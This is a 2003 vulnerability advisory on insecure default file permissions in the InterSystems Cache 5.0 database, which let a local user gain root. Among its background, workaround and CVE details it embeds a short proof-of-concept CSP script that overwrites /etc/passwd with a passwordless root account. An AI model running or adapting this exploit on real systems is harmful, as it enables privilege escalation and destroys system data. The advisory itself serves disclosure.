Title: Cache Database Poor File Permissions Lead To Local Root
Date: March 11, 2003
I. BACKGROUND
"Cache', the post-relational database for e-applications, is optimized for the tougher demands of Web applications. It delivers breakthrough performance for massively scalable Web applications. Its rapid application development environment with advanced object technology lets you operate at Internet speed. Cache's ultra-fast SQL outperforms relational systems 20X. And its multidimensional application and data server delivers lightning-fast performance." (http://www.intersystems.com)
II. DESCRIPTION
The default installation of the Cache database yeilds poorly protected files and directories in the main package tree. Directories and files are open to all users as read write and execute.
III. ANALYSIS
Local attackers can exploit this to manipulate directories and binaries inside the installation tree. This may be used by a local malicious user to gain root access. The content in /cachesys/csp/user is executed as root through the web interface. user's parent directory (csp) is world writeable allowing a local non root user to move user aside, copy its contents and create a new writeable user directory.
<------------------cspexp.csp------------->
Intersystems Cache' local root exploit. Larry W. Cashdollar http://vapid.dhs.org
Because of poor default file and directory permissions a localuser can execute code as root via the cache CSP interpreter.
<script language=Cache runat=server>
Set cdef=##class(%Library.File).%New("/etc/passwd") Do cdef.Open("WSN") Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash") Do cdef.%Close()
</script>
<----------------snip-------------->IV. DETECTION
Cache' Database 5.0 is affected. http://www.intersystems.com
V. WORKAROUND
An administrator could possibly change the file permissions to something more restrictive that would not allow any user to manipulate data in the Cache installation directory. I do not know what the affect this would be on the Cache' database functionality.
VI. VENDOR FIX
http://www.intersystems.com/support/flash/index.html
VII. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has assigned the identification numbers to these issues:
CVE IDS: CVE-2003-0497 overwrite Cache using setud cuxs program CVE-2003-0498 code injection into /cachesys/csp
VIII. REFERENCES
http://www.idefense.com/advisory/07.01.03.txt
IX. CREDIT
Larry W. Cashdollar (http://vapid.dhs.org) discovered this vulnerability.